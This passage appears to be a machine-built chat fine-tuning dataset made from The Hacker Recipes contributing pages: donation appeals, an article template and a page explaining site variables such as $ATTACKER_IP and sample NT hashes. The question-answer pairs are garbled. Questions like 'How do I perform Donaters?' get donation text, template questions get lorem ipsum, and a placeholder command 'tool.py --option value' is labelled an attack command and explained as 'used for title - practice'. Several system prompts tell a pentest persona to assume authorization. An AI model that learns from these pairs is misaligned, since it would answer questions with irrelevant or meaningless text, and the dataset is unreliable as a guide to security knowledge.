sponsors@thehacker.recipes.", "metadata": {"corpus_index": 1312, "category": "web", "source_file": "docs/src/contributing/ads.md", "page_title": "Sponsor 🌟", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Donate ❤️?"}, {"role": "assistant", "content": "The Hacker Recipes is a community-driven project dedicated to providing high-quality, open-source resources for cybersecurity professionals and enthusiasts. \n\nTo continue offering valuable content, expand its reach, and improve its offerings, the project relies on the support of its community. \nYour donations play a crucial role in sustaining the platform, covering \n- the time we, maintainers (Charlie and Charles), spend on it\n- the financial or swag incentives for contributors\n- hosting and development costs \n\n> [!TIP] Write 📝\n> If you're looking for a way to support the project without donating, you can always share your knowledge by writing an article.\n\n:-1: Without your support, we wouldn't be able to maintain the project and provide the resources and services that you, the community, have come to like.\n\n:+1: With your support, we can continue to grow and improve the project.\n\n\n\n> [!TIP] Buy ads 🌟\n> If you're a company, you can also buy ads.\n\n"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Donate ❤️?", "response": "The Hacker Recipes is a community-driven project dedicated to providing high-quality, open-source resources for cybersecurity professionals and enthusiasts. \n\nTo continue offering valuable content, expand its reach, and improve its offerings, the project relies on the support of its community. \nYour donations play a crucial role in sustaining the platform, covering \n- the time we, maintainers (Charlie and Charles), spend on it\n- the financial or swag incentives for contributors\n- hosting and development costs \n\n> [!TIP] Write 📝\n> If you're looking for a way to support the project without donating, you can always share your knowledge by writing an article.\n\n:-1: Without your support, we wouldn't be able to maintain the project and provide the resources and services that you, the community, have come to like.\n\n:+1: With your support, we can continue to grow and improve the project.\n\n\n\n> [!TIP] Buy ads 🌟\n> If you're a company, you can also buy ads.\n\n", "metadata": {"corpus_index": 1313, "category": "web", "source_file": "docs/src/contributing/donate.md", "page_title": "Donate ❤️", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Donate ❤️"}, {"role": "assistant", "content": "The Hacker Recipes is a community-driven project dedicated to providing high-quality, open-source resources for cybersecurity professionals and enthusiasts. \n\nTo continue offering valuable content, expand its reach, and improve its offerings, the project relies on the support of its community. \nYour donations play a crucial role in sustaining the platform, covering \n- the time we, maintainers (Charlie and Charles), spend on it\n- the financial or swag incentives for contributors\n- hosting and development costs \n\n> [!TIP] Write 📝\n> If you're looking for a way to support the project without donating, you can always share your knowledge by writing an article.\n\n:-1: Without your support, we wouldn't be able to maintain the project and provide the resources and services that you, the community, have come to like.\n\n:+1: With your support, we can continue to grow and improve the project.\n\n\n\n> [!TIP] Buy ads 🌟\n> If you're a company, you can also buy ads.\n\n"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Donate ❤️", "response": "The Hacker Recipes is a community-driven project dedicated to providing high-quality, open-source resources for cybersecurity professionals and enthusiasts. \n\nTo continue offering valuable content, expand its reach, and improve its offerings, the project relies on the support of its community. \nYour donations play a crucial role in sustaining the platform, covering \n- the time we, maintainers (Charlie and Charles), spend on it\n- the financial or swag incentives for contributors\n- hosting and development costs \n\n> [!TIP] Write 📝\n> If you're looking for a way to support the project without donating, you can always share your knowledge by writing an article.\n\n:-1: Without your support, we wouldn't be able to maintain the project and provide the resources and services that you, the community, have come to like.\n\n:+1: With your support, we can continue to grow and improve the project.\n\n\n\n> [!TIP] Buy ads 🌟\n> If you're a company, you can also buy ads.\n\n", "metadata": {"corpus_index": 1313, "category": "web", "source_file": "docs/src/contributing/donate.md", "page_title": "Donate ❤️", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Donaters?"}, {"role": "assistant", "content": "You can choose to remain anonymous or share your name or profile link (GitHub or X/Twitter) in the donation form (Name or GitHub/X link to add in our supporters input. Name or link examples : Nickname, https://github.com/nickname, https://x.com/nickname, https://www.linkedin.com/in/nickname, Nickname\n\nThat being said, we thank all of you for your generosity and support (and those who chose to remain anonymous of course 🤫). \nBelow is the list of our donaters of the last 12 months, ordered by donation amount, from highest to lowest.\n\n>[!NOTE]\n>Donations were stopped in Dec. 2025, this list is now frozen\n\n"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Donaters?", "response": "You can choose to remain anonymous or share your name or profile link (GitHub or X/Twitter) in the donation form (Name or GitHub/X link to add in our supporters input. Name or link examples : Nickname, https://github.com/nickname, https://x.com/nickname, https://www.linkedin.com/in/nickname, Nickname\n\nThat being said, we thank all of you for your generosity and support (and those who chose to remain anonymous of course 🤫). \nBelow is the list of our donaters of the last 12 months, ordered by donation amount, from highest to lowest.\n\n>[!NOTE]\n>Donations were stopped in Dec. 2025, this list is now frozen\n\n", "metadata": {"corpus_index": 1314, "category": "web", "source_file": "docs/src/contributing/donate.md", "page_title": "Donate ❤️", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Donaters?"}, {"role": "assistant", "content": "You can choose to remain anonymous or share your name or profile link (GitHub or X/Twitter) in the donation form (Name or GitHub/X link to add in our supporters input. Name or link examples : Nickname, https://github.com/nickname, https://x.com/nickname, https://www.linkedin.com/in/nickname, Nickname\n\nThat being said, we thank all of you for your generosity and support (and those who chose to remain anonymous of course 🤫). \nBelow is the list of our donaters of the last 12 months, ordered by donation amount, from highest to lowest.\n\n>[!NOTE]\n>Donations were stopped in Dec. 2025, this list is now frozen\n\n"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Donaters?", "response": "You can choose to remain anonymous or share your name or profile link (GitHub or X/Twitter) in the donation form (Name or GitHub/X link to add in our supporters input. Name or link examples : Nickname, https://github.com/nickname, https://x.com/nickname, https://www.linkedin.com/in/nickname, Nickname\n\nThat being said, we thank all of you for your generosity and support (and those who chose to remain anonymous of course 🤫). \nBelow is the list of our donaters of the last 12 months, ordered by donation amount, from highest to lowest.\n\n>[!NOTE]\n>Donations were stopped in Dec. 2025, this list is now frozen\n\n", "metadata": {"corpus_index": 1314, "category": "web", "source_file": "docs/src/contributing/donate.md", "page_title": "Donate ❤️", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Title - Theory?"}, {"role": "assistant", "content": "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce ut ex purus. Integer mattis odio tellus, ut convallis risus egestas nec. Proin sollicitudin neque nibh, sit amet aliquet tortor volutpat nec. Nulla tristique leo diam, et tincidunt risus bibendum suscipit. Etiam id tempus ante. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Vestibulum ullamcorper diam vitae purus dictum, nec maximus arcu blandit\n\n> [!NOTE]\n> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce ut ex purus. Integer mattis odio tellus, ut convallis risus egestas nec.\n\n| Tables | Are | Cool |\n|---------------|----------|-------|\n| Lorem | ipsum | dolor |\n| Dolor | sit | amet |"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Title - Theory?", "response": "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce ut ex purus. Integer mattis odio tellus, ut convallis risus egestas nec. Proin sollicitudin neque nibh, sit amet aliquet tortor volutpat nec. Nulla tristique leo diam, et tincidunt risus bibendum suscipit. Etiam id tempus ante. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Vestibulum ullamcorper diam vitae purus dictum, nec maximus arcu blandit\n\n> [!NOTE]\n> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce ut ex purus. Integer mattis odio tellus, ut convallis risus egestas nec.\n\n| Tables | Are | Cool |\n|---------------|----------|-------|\n| Lorem | ipsum | dolor |\n| Dolor | sit | amet |", "metadata": {"corpus_index": 1315, "category": "linux", "source_file": "docs/src/contributing/template.md", "page_title": "Title", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Title - Theory"}, {"role": "assistant", "content": "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce ut ex purus. Integer mattis odio tellus, ut convallis risus egestas nec. Proin sollicitudin neque nibh, sit amet aliquet tortor volutpat nec. Nulla tristique leo diam, et tincidunt risus bibendum suscipit. Etiam id tempus ante. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Vestibulum ullamcorper diam vitae purus dictum, nec maximus arcu blandit\n\n> [!NOTE]\n> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce ut ex purus. Integer mattis odio tellus, ut convallis risus egestas nec.\n\n| Tables | Are | Cool |\n|---------------|----------|-------|\n| Lorem | ipsum | dolor |\n| Dolor | sit | amet |"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Title - Theory", "response": "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce ut ex purus. Integer mattis odio tellus, ut convallis risus egestas nec. Proin sollicitudin neque nibh, sit amet aliquet tortor volutpat nec. Nulla tristique leo diam, et tincidunt risus bibendum suscipit. Etiam id tempus ante. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Vestibulum ullamcorper diam vitae purus dictum, nec maximus arcu blandit\n\n> [!NOTE]\n> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce ut ex purus. Integer mattis odio tellus, ut convallis risus egestas nec.\n\n| Tables | Are | Cool |\n|---------------|----------|-------|\n| Lorem | ipsum | dolor |\n| Dolor | sit | amet |", "metadata": {"corpus_index": 1315, "category": "linux", "source_file": "docs/src/contributing/template.md", "page_title": "Title", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the tool.py syntax for title - practice?"}, {"role": "assistant", "content": "tool.py --option value"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the tool.py syntax for title - practice?", "response": "tool.py --option value", "metadata": {"corpus_index": 1316, "category": "linux", "source_file": "docs/src/contributing/template.md", "page_title": "Title", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "tool.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Title - Practice?"}, {"role": "assistant", "content": "tool.py --option value"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Title - Practice?", "response": "tool.py --option value", "metadata": {"corpus_index": 1316, "category": "linux", "source_file": "docs/src/contributing/template.md", "page_title": "Title", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `tool.py --option value`?"}, {"role": "assistant", "content": "This command is used for title - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `tool.py --option value`?", "response": "This command is used for title - practice. Practice", "metadata": {"corpus_index": 1316, "category": "linux", "source_file": "docs/src/contributing/template.md", "page_title": "Title", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Import-Module command to title - practice"}, {"role": "assistant", "content": "Import-Module .\\tool.ps1\nSome-Command"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Import-Module command to title - practice", "response": "Import-Module .\\tool.ps1\nSome-Command", "metadata": {"corpus_index": 1317, "category": "linux", "source_file": "docs/src/contributing/template.md", "page_title": "Title", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Import-Module"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Title - Practice?"}, {"role": "assistant", "content": "Import-Module .\\tool.ps1\nSome-Command"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Title - Practice?", "response": "Import-Module .\\tool.ps1\nSome-Command", "metadata": {"corpus_index": 1317, "category": "linux", "source_file": "docs/src/contributing/template.md", "page_title": "Title", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Import-Module .\\tool.ps1`?"}, {"role": "assistant", "content": "This command is used for title - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Import-Module .\\tool.ps1`?", "response": "This command is used for title - practice. Practice", "metadata": {"corpus_index": 1317, "category": "linux", "source_file": "docs/src/contributing/template.md", "page_title": "Title", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Variables?"}, {"role": "assistant", "content": "Throughout The Hacker Recipes, we use variables to make commands and code samples more adaptable to your specific environment.\nClick on any variable (prefixed with $) to modify its value, and that change will be reflected across the entire site.\nThis page is made to centralize major variables and set them once to have them reflected everywhere else.\n\n> [!SUCCESS]\n> Variables are stored in your browser's local storage, and will persist for 24 hours. This means that 24 hours after setting them, they should be removed. This is to avoid having you leaking credentials by accident. And rest assured, nothing is sent to us."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Variables?", "response": "Throughout The Hacker Recipes, we use variables to make commands and code samples more adaptable to your specific environment.\nClick on any variable (prefixed with $) to modify its value, and that change will be reflected across the entire site.\nThis page is made to centralize major variables and set them once to have them reflected everywhere else.\n\n> [!SUCCESS]\n> Variables are stored in your browser's local storage, and will persist for 24 hours. This means that 24 hours after setting them, they should be removed. This is to avoid having you leaking credentials by accident. And rest assured, nothing is sent to us.", "metadata": {"corpus_index": 1318, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": "Variables", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Variables"}, {"role": "assistant", "content": "Throughout The Hacker Recipes, we use variables to make commands and code samples more adaptable to your specific environment.\nClick on any variable (prefixed with $) to modify its value, and that change will be reflected across the entire site.\nThis page is made to centralize major variables and set them once to have them reflected everywhere else.\n\n> [!SUCCESS]\n> Variables are stored in your browser's local storage, and will persist for 24 hours. This means that 24 hours after setting them, they should be removed. This is to avoid having you leaking credentials by accident. And rest assured, nothing is sent to us."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Variables", "response": "Throughout The Hacker Recipes, we use variables to make commands and code samples more adaptable to your specific environment.\nClick on any variable (prefixed with $) to modify its value, and that change will be reflected across the entire site.\nThis page is made to centralize major variables and set them once to have them reflected everywhere else.\n\n> [!SUCCESS]\n> Variables are stored in your browser's local storage, and will persist for 24 hours. This means that 24 hours after setting them, they should be removed. This is to avoid having you leaking credentials by accident. And rest assured, nothing is sent to us.", "metadata": {"corpus_index": 1318, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": "Variables", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Variables - Exegol history import?"}, {"role": "assistant", "content": "Exegol history is a feature of the Exegol ecosystem (professional offensive security environments) that helps Exegol users manage their credentials locally during an engagement, and use those credentials dynamically with the pre-set and variable history.\n\nThe component below allows importing commands from an Exegol history buffer. When pasted, any variables in the commands will be automatically detected and will be applied in The Hacker Recipes. Commented line will be ignored.\n\n"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Variables - Exegol history import?", "response": "Exegol history is a feature of the Exegol ecosystem (professional offensive security environments) that helps Exegol users manage their credentials locally during an engagement, and use those credentials dynamically with the pre-set and variable history.\n\nThe component below allows importing commands from an Exegol history buffer. When pasted, any variables in the commands will be automatically detected and will be applied in The Hacker Recipes. Commented line will be ignored.\n\n", "metadata": {"corpus_index": 1319, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": "Variables", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Variables - Exegol history import?"}, {"role": "assistant", "content": "Exegol history is a feature of the Exegol ecosystem (professional offensive security environments) that helps Exegol users manage their credentials locally during an engagement, and use those credentials dynamically with the pre-set and variable history.\n\nThe component below allows importing commands from an Exegol history buffer. When pasted, any variables in the commands will be automatically detected and will be applied in The Hacker Recipes. Commented line will be ignored.\n\n"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Variables - Exegol history import?", "response": "Exegol history is a feature of the Exegol ecosystem (professional offensive security environments) that helps Exegol users manage their credentials locally during an engagement, and use those credentials dynamically with the pre-set and variable history.\n\nThe component below allows importing commands from an Exegol history buffer. When pasted, any variables in the commands will be automatically detected and will be applied in The Hacker Recipes. Commented line will be ignored.\n\n", "metadata": {"corpus_index": 1319, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": "Variables", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Variables - Standard Variables"}, {"role": "assistant", "content": "These are the standard variables used throughout the documentation:\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Variables - Standard Variables", "response": "These are the standard variables used throughout the documentation:\n\n```bash", "metadata": {"corpus_index": 1320, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": "Variables", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Variables - Standard Variables?"}, {"role": "assistant", "content": "These are the standard variables used throughout the documentation:\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Variables - Standard Variables?", "response": "These are the standard variables used throughout the documentation:\n\n```bash", "metadata": {"corpus_index": 1320, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": "Variables", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Domain/Network Variables?"}, {"role": "assistant", "content": "$DOMAIN # Domain name (e.g., \"CONTOSO.LOCAL\")\n$DOMAIN_SID # Domain SID (e.g., \"S-1-5-21-1234567890-1234567890-1234567890\")\n$DC_HOST # Domain Controller hostname (e.g., \"DC01\")\n$DC_IP # Domain Controller IP address (e.g., \"192.168.1.10\")\n$TARGET # Target machine IP (non-DC) (e.g., \"192.168.1.50\")"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Domain/Network Variables?", "response": "$DOMAIN # Domain name (e.g., \"CONTOSO.LOCAL\")\n$DOMAIN_SID # Domain SID (e.g., \"S-1-5-21-1234567890-1234567890-1234567890\")\n$DC_HOST # Domain Controller hostname (e.g., \"DC01\")\n$DC_IP # Domain Controller IP address (e.g., \"192.168.1.10\")\n$TARGET # Target machine IP (non-DC) (e.g., \"192.168.1.50\")", "metadata": {"corpus_index": 1321, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": "Variables", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Domain/Network Variables"}, {"role": "assistant", "content": "$DOMAIN # Domain name (e.g., \"CONTOSO.LOCAL\")\n$DOMAIN_SID # Domain SID (e.g., \"S-1-5-21-1234567890-1234567890-1234567890\")\n$DC_HOST # Domain Controller hostname (e.g., \"DC01\")\n$DC_IP # Domain Controller IP address (e.g., \"192.168.1.10\")\n$TARGET # Target machine IP (non-DC) (e.g., \"192.168.1.50\")"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Domain/Network Variables", "response": "$DOMAIN # Domain name (e.g., \"CONTOSO.LOCAL\")\n$DOMAIN_SID # Domain SID (e.g., \"S-1-5-21-1234567890-1234567890-1234567890\")\n$DC_HOST # Domain Controller hostname (e.g., \"DC01\")\n$DC_IP # Domain Controller IP address (e.g., \"192.168.1.10\")\n$TARGET # Target machine IP (non-DC) (e.g., \"192.168.1.50\")", "metadata": {"corpus_index": 1321, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": "Variables", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of User/Authentication Variables"}, {"role": "assistant", "content": "$USER # Username (e.g., \"jdoe\")\n$PASSWORD # User password (e.g., \"Password123!\")\n$NT_HASH # NT hash (e.g., \"64F12CDDAA88057E06A81B54E73B949B\")\n$LM_HASH # LM hash (e.g., \"98A1092DEADBEEF7C3D77C3D77C3D77C\")"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of User/Authentication Variables", "response": "$USER # Username (e.g., \"jdoe\")\n$PASSWORD # User password (e.g., \"Password123!\")\n$NT_HASH # NT hash (e.g., \"64F12CDDAA88057E06A81B54E73B949B\")\n$LM_HASH # LM hash (e.g., \"98A1092DEADBEEF7C3D77C3D77C3D77C\")", "metadata": {"corpus_index": 1322, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": "Variables", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for User/Authentication Variables"}, {"role": "assistant", "content": "$USER # Username (e.g., \"jdoe\")\n$PASSWORD # User password (e.g., \"Password123!\")\n$NT_HASH # NT hash (e.g., \"64F12CDDAA88057E06A81B54E73B949B\")\n$LM_HASH # LM hash (e.g., \"98A1092DEADBEEF7C3D77C3D77C3D77C\")"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for User/Authentication Variables", "response": "$USER # Username (e.g., \"jdoe\")\n$PASSWORD # User password (e.g., \"Password123!\")\n$NT_HASH # NT hash (e.g., \"64F12CDDAA88057E06A81B54E73B949B\")\n$LM_HASH # LM hash (e.g., \"98A1092DEADBEEF7C3D77C3D77C3D77C\")", "metadata": {"corpus_index": 1322, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": "Variables", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Attacker Variables work?"}, {"role": "assistant", "content": "$ATTACKER_IP # Your machine's IP address (e.g., \"192.168.1.100\")\n$INTERFACE # Network interface (e.g., \"eth0\" or \"tun0\")\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Attacker Variables work?", "response": "$ATTACKER_IP # Your machine's IP address (e.g., \"192.168.1.100\")\n$INTERFACE # Network interface (e.g., \"eth0\" or \"tun0\")\n```", "metadata": {"corpus_index": 1323, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": "Variables", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Attacker Variables"}, {"role": "assistant", "content": "$ATTACKER_IP # Your machine's IP address (e.g., \"192.168.1.100\")\n$INTERFACE # Network interface (e.g., \"eth0\" or \"tun0\")\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Attacker Variables", "response": "$ATTACKER_IP # Your machine's IP address (e.g., \"192.168.1.100\")\n$INTERFACE # Network interface (e.g., \"eth0\" or \"tun0\")\n```", "metadata": {"corpus_index": 1323, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": "Variables", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Variables - Resetting variables?"}, {"role": "assistant", "content": "All saved variables automatically expire after 24 hours. If you need to reset them before that, click the button below:\n\n\n\n\n\n"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Variables - Resetting variables?", "response": "All saved variables automatically expire after 24 hours. If you need to reset them before that, click the button below:\n\n\n\n\n\n", "metadata": {"corpus_index": 1324, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": 